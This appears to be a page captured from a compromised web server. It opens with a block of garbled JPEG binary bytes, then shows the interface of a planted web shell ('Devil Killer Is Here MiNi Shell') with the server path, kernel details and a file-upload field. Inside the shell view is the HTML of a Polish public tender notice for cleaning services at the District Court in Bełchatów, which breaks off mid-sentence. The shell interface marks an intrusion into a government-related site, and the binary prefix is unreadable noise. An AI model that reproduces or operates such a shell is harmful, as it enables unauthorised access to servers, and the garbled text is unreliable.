JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221026/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221026/0041173001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „USŁUGA UTRZYMANIA CZYSTOŚCI WRAZ Z ZAPEWNIENIEM ŚRODKÓW HIGIENICZNYCH ORAZ USŁUGI GOSPODARCZO-KONSERWATORSKIE W OBIEKCIE I NA TERENIE ZEWNĘTRZNYM SĄDU REJONOWEGO W BEŁCHATOWIE PRZY UL. OKRZEI 4” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy w Bełchatowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000323192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Okrzei 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bełchatów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">administracja@belchatow.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://belchatow.sr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Sąd powszechny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „USŁUGA UTRZYMANIA CZYSTOŚCI WRAZ Z ZAPEWNIENIEM ŚRODKÓW HIGIENICZNYCH ORAZ USŁUGI GOSPODARCZO-KONSERWATORSKIE W OBIEKCIE I NA TERENIE ZEWNĘTRZNYM SĄDU REJONOWEGO W BEŁCHATOWIE PRZY UL. OKRZEI 4” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-207d72ae-5520-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00411730</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-10-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00077411/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług sprzątania, utrzymanie czystości i usług gospodarczo – konserwatorskich w obiekcie Sądu Rejonowego w Bełchatowie w 2023r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-207d72ae-5520-11ed-9171-f6b7c7d59353 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">19.7. Do pełnego i prawidłowego korzystania z platformy zakupowej przez użytkowników <br/>Wykonawcy konieczne jest posiadanie przez co najmniej jednego uprawnionego <br/>użytkownika Wykonawcy kwalifikowanego podpisu elektronicznego służącego do <br/>autentykacji i podpisu elektronicznego.<br/>19.8. Korzystanie z platformy zakupowej możliwe jest pod warunkiem spełnienia przez sprzęt, z <br/>którego korzystają użytkownicy Wykonawcy następujących minimalnych wymagań <br/>technicznych i specyfiki połączenia, posiadanie komputera o parametrach umożliwiających <br/>zainstalowanie następującego oprogramowania:<br/>19.8.1. w zakresie podstawowych funkcjonalności - przegląd , pobieranie i załączanie <br/>dokumentów:<br/>19.8.1.1. przeglądarka Internetowa Internet Explorer 11, Chrome ver. 45 I późniejsze, <br/>Firefox ver. 54 I późniejsze lub Opera w ver. 37 i późniejsze,<br/>19.8.1.2. system operacyjny Windows 7 i późniejsze<br/>19.8.2. w zakresie składania podpisu kwalifikowanego:<br/>19.8.2.1.zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>19.8.2.2.w przypadku przeglądarek Opera, Chrome I Firefox należy doinstalować dodatek <br/>do przeglądarki Szafir SDK Web<br/>19.8.2.3.oprogramowania SzafirHost w systemie operacyjnym.<br/>Instrukcja instalowania oprogramowania wskazanego w punktach 19.8.2.1., 19.8.2.2. i 19.8.2.3.<br/>znajduje się na platformie zakupowej w zakładce E-learning.<br/>19.9. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych <br/>i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z <br/>usług Systemu (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla <br/>wszystkich użytkowników platformy zakupowej oraz podczas rejestracji konta Wykonawcy <br/>dla Wykonawców.<br/>19.10. Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej <br/>zapewnionych w platformie zakupowej jest uzależnione od uprzedniej akceptacji przez <br/>Wykonawcę Regulaminu korzystania z usług platformy zakupowej na witrynie internetowej <br/>przy zakładaniu profilu Wykonawcy.<br/>19.11. Korzystanie z platformy zakupowej przez Wykonawców jest bezpłatne.<br/>20 z 23<br/>19.12. W sytuacji awarii lub błędów lub niedostępności portalu zakupowego uniemożliwiających <br/>komunikację Wykonawcy i Zamawiającego poprzez platformę zakupowa, Zamawiający <br/>dopuszcza komunikację za pomocą poczty elektronicznej na adres: <br/>administracja@belchatow.sr.gov.pl (nie dotyczy składania ofert i JEDZ).<br/>19.13. Maksymalny rozmiar pojedynczych plików przesyłanych za pośrednictwem platformy <br/>zakupowej wynosi 100 MB. Za pośrednictwem platformy zakupowej można przesłać wiele <br/>pojedynczych plików lub plik poddający dane kompresji (ZIP) zawierający wiele <br/>pojedynczych plików.<br/>19.14. Dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB:.xml, .pdf, .doc, <br/>.docx, .xls lub .xlsx<br/>19.15. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, <br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji <br/>przyjmuje się datę ich przekazania do platformy zakupowej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D-262-2/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 5.1. Przedmiotem zamówienia jest usługa utrzymania czystości wraz z zapewnieniem środków <br/>higienicznych oraz usługi gospodarczo-konserwatorskie w obiekcie i na terenie zewnętrznym <br/>Sądu Rejonowego w Bełchatowie przy ul. Okrzei 4” . Zakres usługi obejmuje m.in.:<br/>5.1.1.sprzątanie pokoi biurowych, sal rozpraw, łazienek, toalet, korytarzy i klatek schodowych o <br/>łącznej powierzchni ok. 3.255,08 m2 włącznie z konserwacją podłóg - przy zastosowaniu <br/>środków czystości i sprzętu wykonawcy, wraz z uzupełnianiem dozowników w łazienkach i <br/>toaletach w mydło w płynie, ręczniki papierowe i papier toaletowy oraz płyn do mycia <br/>naczyń, które zapewnia Wykonawca zgodnie ze specyfikacją dozowników będących na <br/>wyposażeniu Zamawiającego, którą będzie stanowić Załącznik Nr 1 „Zakres usługi” do <br/>wzoru umowy - codziennie;<br/>5.1.2.mycie zewnętrznych i wewnętrznych powierzchni okien, w holu głównym od strony parkingu <br/>i ulicy na bieżąco według potrzeb, nie rzadziej niż jeden raz w miesiącu,<br/>5.1.3.mycie okien i parapetów - 2 razy w okresie obowiązywania umowy.<br/>5.1.4.wykonywanie usług gospodarczo-konserwatorskich oraz utrzymywanie czystości na <br/>przyległym terenie zewnętrznym przy ul. Okrzei 4 przy użyciu sprzętu i urządzeń <br/>Wykonawcy, według Załącznika Nr 1 „Zakres usługi” do wzoru umowy – na bieżąco;<br/>5.2. Szczegółowy zakres usług, wykaz pomieszczeń, powierzchnie, zakres czynności oraz dane <br/>dotyczące minimalnej liczby osób zatrudnionych do sprzątania i czasu ich pracy - określone <br/>5 z 23<br/>zostały w Załączniku Nr 1 „zakres usługi” do wzoru umowy. Dane dotyczące minimalnej liczby <br/>osób (zaznaczone kursywą) podane zostały w celu umożliwienia wykonawcom wypracowania <br/>optymalnych rozwiązań dotyczących składu osobowego personelu sprzątającego i sporządzenia <br/>kalkulacji kosztów.<br/>5.3. Zamawiający dopuszcza możliwość powierzenia podwykonawcom wykonania części <br/>zamówienia określonych w pkt 5.1.3. wymagających zastosowania specjalistycznego <br/>sprzętu, dotyczy to np. fasady aluminiowej z oknami nieotwieranymi lub uchylnymi <br/>(wymagających mycia z zewnątrz budynku przy pomocy np. zwyżki). Wykonawca <br/>odpowiada za działania podwykonawców jak za działania własne.<br/>5.4. Zgodnie z art. 121 ustawy Pzp pozostałe usługi, o których mowa w pkt. 5.1.1., 5.1.2. i 5.1.4.<br/>wykonawca zobowiązany jest świadczyć w obsadzie składającej się z własnych <br/>pracowników (osobiście) i nie powierzać ich wykonania podwykonawcom.<br/>5.5. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych <br/>we wzorze umowy stanowiącym Załącznik nr 4 do SWZ.<br/>5.6. Wymagana jest należyta staranność przy realizacji zobowiązań umowy, rozumiana jako <br/>staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90911200-8 - Usługi sprzątania budynków</p> <p class="mb-0">90911300-9 - Usługi czyszczenia okien</p> <p class="mb-0">90919200-4 - Usługi sprzątania biur</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <p class="mb-0">50850000-8 - Usługi w zakresie napraw i konserwacji mebli</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 9.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu dotyczące:<br/>9.1.1. SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada ubezpieczenie odpowiedzialności <br/>cywilnej w zakresie prowadzonej działalności na kwotę, o wartości nie mniejszej niż <br/>1.000.000,00 PLN (słownie: jeden milion złotych).<br/>9.1.2. ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ:<br/>Wykonawca spełni warunek, jeżeli wykaże, że należycie wykonał lub wykonuje w <br/>okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie <br/>zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, <br/>9 z 23<br/>zamówienie, którego przedmiotem była lub jest jedna usługa utrzymania <br/>czystości w obiektach zamieszkania zbiorowego lub użyteczności publicznej<br/>(usługa realizowana na podstawie jednej umowy na rzecz jednego odbiorcy) <br/>realizowana nie krócej niż 12 miesięcy bez przerwy, której wartość, zarówno w <br/>przypadku umów zrealizowanych jak i będących w trakcie realizacji wynosi, nie <br/>mniej niż 15 000,00 brutto (słownie: piętnaście tysięcy złotych) za okres 1 <br/>miesiąca.<br/>9.2. Zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie <br/>warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz.U. z <br/>2022 r., poz. 1225) przez:<br/>9.2.1. „budynek zamieszkania zbiorowego&#34; - należy rozumieć budynek przeznaczony do <br/>okresowego pobytu ludzi, w szczególności hotel, motel, pensjonat, dom wypoczynkowy, <br/>dom wycieczkowy, schronisko młodzieżowe, schronisko, internat, dom studencki, <br/>budynek koszarowy, budynek zakwaterowania na terenie zakładu karnego, aresztu <br/>śledczego, zakładu poprawczego, schroniska dla nieletnich, a także budynek do stałego <br/>pobytu ludzi, w szczególności dom dziecka, dom rencistów i dom zakonny;<br/>9.2.2. „budynek użyteczności publicznej&#34; należy rozumieć budynek przeznaczony na potrzeby <br/>administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty,<br/>szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, <br/>obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub <br/>telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, <br/>drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek <br/>przeznaczony do wykonywania podobnych funkcji; za budynek użyteczności publicznej <br/>uznaje się także budynek biurowy lub socjalny.<br/>9.3. Zamawiający zastrzega możliwość weryfikacji potwierdzenia należytego wykonania prac <br/>bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>9.4. Ocena spełnienia warunków udziału w postępowaniu będzie dokonywana metodą 0-1, tj. nie <br/>spełnia/ spełnia w oparciu o oświadczenie o spełnianiu warunków udziału w <br/>postępowaniu.<br/>9.5. Wykonawca, który zamierza powierzyć wykonanie części usługi innej firmie<br/>(podwykonawcy) jest zobowiązany do:<br/>9.5.1. określenia w złożonej ofercie (na formularzu oferty - załącznik 1 do SWZ) informacji <br/>jaka część przedmiotu zamówienia będzie realizowana przez podwykonawców z <br/>podaniem jego danych, jeżeli są znane.<br/>9.5.2. Zamawiający nie wymaga, aby Wykonawca składał dokumenty lub oświadczenia o <br/>braku podstaw do wykluczenia odnoszące się do podwykonawcy, który nie udostępnił <br/>swoich zasobów.<br/>10 z 23<br/>9.5.3. Za zgodą Zamawiającego, Wykonawca może w trakcie realizacji zamówienia zgłosić <br/>nowych podwykonawców do realizacji zamówienia.<br/>9.5.4. Zgodnie z art. 118 ust. 3 ustawy Pzp Wykonawca, który polega na zdolnościach lub <br/>sytuacji Podmiotów udostępniających zasoby, składa, wraz z wnioskiem o dopuszczenie <br/>do udziału w postępowaniu albo odpowiednio wraz z ofertą, m.in. zobowiązanie <br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów <br/>na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy <br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi <br/>zasobami tych podmiotów oraz oświadczenia Podmiotu udostępniającego zasoby o <br/>braku podstaw wykluczenia.<br/>9.5.5. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia warunek określony powyżej musi spełniać samodzielnie co <br/>najmniej jeden z tych Wykonawców. W tym zakresie Zamawiający nie dopuszcza <br/>sumowania doświadczenia Wykonawców wspólnie ubiegających się o zamówienie.<br/>9.5.6. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada <br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w <br/>szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w <br/>inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na <br/>realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana Umowy<br/>1. Strony przewidują możliwość dokonania zmiany zawartej Umowy w następujących <br/>przypadkach i zakresach, gdy konieczność wprowadzenia zmian wynika z <br/>okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, tj. <br/>spowodowanych m.in.:<br/>a) zmianą powszechnie obowiązujących przepisów prawa lub wynikających z <br/>prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych <br/>organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania <br/>postanowień Umowy do zaistniałego stanu prawnego lub faktycznego,<br/>b) siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, <br/>zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się <br/>uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia <br/>Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie <br/>wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań <br/>w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań <br/>umownych, powstałego na skutek działania siły wyższej.<br/>2. Zamawiający zastrzega sobie prawo:<br/>a) zmniejszenia zakresu świadczonych Usług, w szczególności w odniesieniu do <br/>wielkości sprzątanych powierzchni, nie więcej jednak niż o 30 % w stosunku do <br/>powierzchni wskazanych z Załączniku nr 1 do Umowy i w związku z tym zmiany <br/>wynagrodzenia Wykonawcy, w przypadku wystąpienia co najmniej jednej z <br/>następujących okoliczności: prowadzenia prac remontowych lub inwestycyjnych, <br/>zmian organizacyjnych u Zamawiającego, wyłączenia pomieszczeń (budynków) z <br/>eksploatacji.<br/>b) zwiększenia zakresu świadczonych Usług, w szczególności w odniesieniu do <br/>wielkości sprzątanych powierzchni, o maksymalnie 30 % w stosunku do <br/>Strona 15 z 19<br/>Załącznik nr 4 do SWZ<br/>powierzchni wskazanych z Załączniku nr 1 do Umowy lub do przedłużenia terminu <br/>obowiązywania Umowy nie dłużej jednak niż o 4 miesiące i w związku z tym <br/>zmiany wynagrodzenia Wykonawcy.<br/>3. Zmiana wysokości wynagrodzenia należnego Wykonawcy 